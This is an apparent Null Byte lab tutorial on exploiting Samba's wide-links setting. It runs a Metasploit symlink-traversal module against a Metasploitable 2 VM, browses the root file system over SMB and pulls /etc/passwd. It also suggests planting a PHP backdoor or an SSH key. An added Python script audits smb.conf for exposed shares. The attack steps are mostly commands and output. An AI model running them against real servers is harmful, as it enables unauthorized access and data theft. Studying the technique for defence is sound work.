How to Get Root File System Access Through Samba Symlink Traversal « Null Byte :: WonderHowTo



Samba can be configured so that anyone with write access to a share can create a link to the root file system. Once an attacker has this level of access, it is only a matter of time before the system is fully compromised. Although this configuration is not that common in the wild, it does happen, and Metasploit has a module that makes the misconfiguration easy to exploit.

Symbolic links, or symlinks, are files that point to other files or directories on a system, and they are an integral part of the Linux environment. Symlinks are often used to link libraries and to redirect specific binaries to other versions.

File-sharing systems such as Samba can use symbolic links to give users easy access to linked folders and files. However, these links are usually confined to the share itself, which prevents access to the underlying file system.

Samba has an option to allow wide links. These are essentially symbolic links that may point outside the share's sandbox. This is obviously a major security issue, since any user with write access to a share can create a link to the root file system.
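An added example that is not from the article: a Python audit that parses an smb.conf in the style of the vulnerable target next to a corrected one and reports the writable shares on which wide links are in effect. Both sample configurations are constructed, and the modern_samba flag assumes the rule introduced in Samba 3.4.6/3.5.1 (wide links off by default and forced off when unix extensions are on).

```python
import configparser

# Constructed sample (not from the article): the 'tmp' share is writable and
# wide links are in force, so a link created inside it can point anywhere.
WEAK_SMB_CONF = """\
[global]
unix extensions = no
wide links = yes
[tmp]
path = /tmp
read only = no
"""

# Corrected counterpart: wide links off and unix extensions on.
HARDENED_SMB_CONF = """\
[global]
unix extensions = yes
wide links = no
[tmp]
path = /tmp
read only = no
"""

def _is_yes(value):
    return str(value).strip().lower() in ("yes", "true", "1")

def _writable(share, glob):
    for synonym in ("writable", "writeable"):  # Samba synonyms override 'read only'
        if synonym in share:
            return _is_yes(share[synonym])
    return not _is_yes(share.get("read only", glob.get("read only", "yes")))

def wide_link_shares(conf_text, modern_samba=True):
    """Writable shares on which wide links are in effect. With modern_samba
    (Samba 3.4.6/3.5.1 and later) wide links default to 'no' and are forced
    off by 'unix extensions = yes'; Samba 3.0.20 defaulted them to 'yes'."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(conf_text)
    glob = cp["global"] if cp.has_section("global") else {}
    unix_ext = _is_yes(glob.get("unix extensions", "yes"))
    default_wide = "no" if modern_samba else "yes"
    exposed = []
    for name in (s for s in cp.sections() if s != "global"):
        share = cp[name]
        wide = _is_yes(share.get("wide links", glob.get("wide links", default_wide)))
        if modern_samba and unix_ext:
            wide = False  # cannot be enabled alongside unix extensions
        if wide and _writable(share, glob):
            exposed.append(name)
    return exposed
```

Note that on the old release a share with no explicit wide links setting is still exposed, which is why the corrected configuration sets the option rather than relying on defaults.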

For this demonstration, we use Kali Linux to attack a Metasploitable 2 virtual machine. If you have a similar pentesting lab, you can follow along.

Step 1: Create the Link with Metasploit

Once we have determined that the SMB service is running on the target, we first need to check whether we can access any shares and, if so, find their names. We can use smbclient for this:

  ~ # smbclient -L //10.10.0.50/

Enter WORKGROUP\root's password:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh no!
        opt             Disk
        IPC$            IPC       IPC Service (Samba 3.0.20 Debian Server)
        ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20 Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            METASPLOITABLE

You can see above that we can log in anonymously and list the shares. There are some standard shares, but the one that looks interesting is called tmp. It even has a suspicious comment, so we will use it as our target share.

Then start Metasploit by typing msfconsole in the terminal.

  ~ # msfconsole

[-] *** Starting the Metasploit Framework console.../
[-] * WARNING: No database support: No database YAML file
[-] ***

(Metasploit ASCII art banner: "To boldly go where no shell has gone before")

       =[ metasploit v5.0.20-dev                          ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 >


Once the banner has loaded and we are greeted with the prompt, we can look for a suitable module with the search command:

  msf5 > search samba symlink

Matching Modules
================

   #   Name                                                 Disclosure Date  Rank       Check  Description
   -   ----                                                 ---------------  ----       -----  -----------
   0   auxiliary/admin/smb/samba_symlink_traversal                           normal     No     Samba Symlink Directory Traversal
   1   auxiliary/dos/samba/lsa_addprivs_heap                                 normal     No     Samba lsa_io_privilege_set Heap Overflow
   2   auxiliary/dos/samba/lsa_transnames_heap                               normal     No     Samba lsa_io_trans_names Heap Overflow
   3   auxiliary/dos/samba/read_nttrans_ea_list                              normal     No     Samba read_nttrans_ea_list Integer Overflow
   4   auxiliary/scanner/rsync/modules_list                                  normal     Yes    List Rsync Modules
   5   auxiliary/scanner/smb/smb_uninit_cred                                 normal     Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State
   6   auxiliary/server/wget_symlink_file_write             2014-10-27       normal     No     GNU Wget FTP Symlink Arbitrary Filesystem Access
   7   exploit/freebsd/samba/trans2open                     2003-04-07       excellent  No     Samba trans2open Overflow (*BSD x86)
   8   exploit/linux/local/abrt_raceabrt_priv_esc           2015-04-14       excellent  Yes    ABRT raceabrt Privilege Escalation
   9   exploit/linux/local/asan_suid_executable_priv_esc    2016-02-17       excellent  Yes    AddressSanitizer (ASan) SUID Executable Privilege Escalation
   10  exploit/linux/samba/chain_reply                      2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
   11  exploit/linux/samba/is_known_pipename                2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
   12  exploit/linux/samba/lsa_transnames_heap              2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
   13  exploit/linux/samba/setinfopolicy_heap               2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   14  exploit/linux/samba/trans2open                       2003-04-07       excellent  No     Samba trans2open Overflow (Linux x86)
   15  exploit/multi/samba/nttrans                          2003-04-07       average    No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   16  exploit/multi/samba/usermap_script                   2007-05-14       excellent  No     Samba "username map script" Command Execution
   17  exploit/osx/samba/lsa_transnames_heap                2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   18  exploit/osx/samba/trans2open                         2003-04-07                  No     Samba trans2open Overflow (Mac OS X PPC)
   19  exploit/solaris/samba/lsa_transnames_heap            2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   20  exploit/solaris/samba/trans2open                     2003-04-07                  No     Samba trans2open Overflow (Solaris SPARC)
   21  exploit/unix/http/quest_kace_systems_management_rce  2018-05-31       excellent  Yes    Quest KACE Systems Management Command Injection
   22  exploit/unix/misc/distcc_exec                        2002-02-01       excellent  Yes    DistCC Daemon Command Execution
   23  exploit/unix/webapp/citrix_access_gateway_exec       2010-12-21       excellent  Yes    Citrix Access Gateway Command Execution
   24  exploit/windows/fileformat/ms14_060_sandworm         2014-10-14       excellent  No     MS14-060 Microsoft Windows OLE Package Manager Code Execution
   25  exploit/windows/http/sambar6_search_results          2003-06-21       normal     Yes    Sambar 6 Search Results Buffer Overflow
   26  exploit/windows/license/calicclnt_getconfig          2005-03-02       average    No     Computer Associates License Client GETCONFIG Overflow
   27  exploit/windows/local/ms13_097_ie_registry_symlink   2013-12-10       great      No     MS13-097 Registry Symlink IE Sandbox Escape
   28  exploit/windows/smb/group_policy_startup             2015-01-26       manual     No     Group Policy Script Execution From Shared Resource
   29  post/linux/gather/enum_configs                                        normal     No     Linux Gather Configurations

We get quite a few results for this search term, but the one we want is actually the first. Load the module with the use command followed by the module path:

  msf5 > use auxiliary/admin/smb/samba_symlink_traversal

Now that we are in the module's context, the options command displays its settings:

  msf5 auxiliary(admin/smb/samba_symlink_traversal) > options

Module options (auxiliary/admin/smb/samba_symlink_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      445              yes       The SMB service port (TCP)
   SMBSHARE                    yes       The name of a writable share on the server
   SMBTARGET  rootfs           yes       The name of the directory that should point to the root filesystem.

Port 445 is already set as the correct SMB port, as is the name of the directory that will be created and linked to the root file system. We need to set the RHOSTS option to the IP address of the target:

  msf5 auxiliary(admin/smb/samba_symlink_traversal) > set rhosts 10.10.0.50

rhosts => 10.10.0.50

And the name of the share we want to write to, in this case the tmp share:

  msf5 auxiliary(admin/smb/samba_symlink_traversal) > set smbshare tmp

smbshare => tmp

Now we should be all set; just type run at the prompt to start the module:

  msf5 auxiliary(admin/smb/samba_symlink_traversal) > run

[*] Running module against 10.10.0.50

[*] 10.10.0.50:445 - Connecting to the server...
[*] 10.10.0.50:445 - Trying to mount writeable share 'tmp'...
[*] 10.10.0.50:445 - Trying to link 'rootfs' to the root filesystem...
[*] 10.10.0.50:445 - Now access the following share to browse the root filesystem:
[*] 10.10.0.50:445 - \\10.10.0.50\tmp\rootfs\

[*] Auxiliary module execution completed

The module reports what it is doing as it runs: it first connects to the server and mounts the specified writable share. It then creates a link to the root file system and tells us where to access it. Perfect.

Step 2: Accessing the Root File System

Once the module has done its job, we can leave Metasploit with the exit command and use smbclient to connect to the target SMB share:

  msf5 > exit
~ # smbclient //10.10.0.50/tmp

Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \>

We can log in anonymously again and use the command ls to see the contents of the share:

  smb: \> ls

  .                                   D        0  Wed Aug  8 10:52:28 2018
  ..                                 DR        0  Sun May 20 13:36:12 2012
  4600.jsvc_up                        R        0  Wed Aug  8 08:57:48 2018
  .ICE-unix                          DH        0  Wed Aug  8 08:56:05 2018
  .X11-unix                          DH        0  Wed Aug  8 08:56:51 2018
  .X0-lock                           HR       11  Wed Aug  8 08:56:51 2018
  rootfs                             DR        0  Sun May 20 13:36:12 2012

                7282168 blocks of size 1024. 5430648 blocks available

Here is the new directory created by the Metasploit module. It is really a link, but we can change into it like a normal directory. Let's do that and see what is inside:

  smb: \> cd rootfs
smb: \rootfs\> ls

  .                                  DR        0  Sun May 20 13:36:12 2012
  ..                                 DR        0  Sun May 20 13:36:12 2012
  initrd                             DR        0  Tue Mar 16 17:57:40 2010
  media                              DR        0  Tue Mar 16 17:55:52 2010
  bin                                DR        0  Sun May 13 22:35:33 2012
  lost+found                         DR        0  Tue Mar 16 17:55:15 2010
  mnt                                DR        0  Wed Apr 28 15:16:56 2010
  sbin                               DR        0  Sun May 13 20:54:53 2012
  initrd.img                          R  7929183  Sun May 13 22:35:56 2012
  home                               DR        0  Fri Apr 16 01:16:02 2010
  lib                                DR        0  Sun May 13 22:35:22 2012
  usr                                DR        0  Tue Apr 27 23:06:37 2010
  proc                               DR        0  Wed Aug  8 08:55:30 2018
  root                               DR        0  Wed Aug  8 08:56:51 2018
  sys                                DR        0  Wed Aug  8 08:55:31 2018
  boot                               DR        0  Sun May 13 22:36:28 2012
  nohup.out                           R    20962  Wed Aug  8 08:56:51 2018
  etc                                DR        0  Wed Aug  8 08:56:23 2018
  dev                                DR        0  Wed Aug  8 08:56:06 2018
  vmlinuz                             R  1987288  Thu Apr 10 11:55:41 2008
  opt                                DR        0  Tue Mar 16 17:57:39 2010
  var                                DR        0  Wed Mar 17 09:08:23 2010
  cdrom                              DR        0  Tue Mar 16 17:55:51 2010
  tmp                                 D        0  Wed Aug  8 10:52:28 2018
  srv                                DR        0  Tue Mar 16 17:57:38 2010

                7282168 blocks of size 1024. 5430648 blocks available

And there we have it: root file system access. We can now do things like view /etc/passwd, although we can't read it directly from within smbclient. Instead, change into the /etc/ directory and download the file to our machine with the get command:

  smb: \rootfs\> cd etc
smb: \rootfs\etc\> get passwd

getting file \rootfs\etc\passwd of size 1581 as passwd (128.7 KiloBytes/sec) (average 128.7 KiloBytes/sec)

Now we can see every user on the target, their home directories, and their login shells, all useful information for further enumeration:

  ~ # cat passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false

Other Attack Scenarios

Now that we have access to the root file system, there are several directions an attacker could take. It all depends on the attacker's imagination and the configuration of the target.

There is an important caveat here: although we can reach the root of the file system, we do not have root privileges. We only have the permissions tied to the anonymous login on the tmp share (usually those of a normal user). This limits what can be done, but depending on how the server is configured, there are still a few things worth trying.

For example, since we have write access, we could place a PHP backdoor in the Apache web root and browse to it to launch a shell back to our local machine. Another attack vector, if the permissions on the SSH configuration are lax, is to add our key to the authorized_keys file so that we can SSH into the box.

As a hacker, it's imperative to be creative, even in situations where getting a shell seems impossible. With enough patience and creativity, it can be done.

Summary

Today we learned how to exploit wide links in Samba to gain access to the root file system. After verifying that we could reach an SMB share, we used a Metasploit module to create a link pointing to the root directory on the server. We were then able to browse the root file system and consider some possible attack vectors. Recognizing how a simple misconfiguration can be used to compromise a system should be a goal of any white-hat hacker.

Cover image by Pixabay/Pexels; screenshots by drd_/Null Byte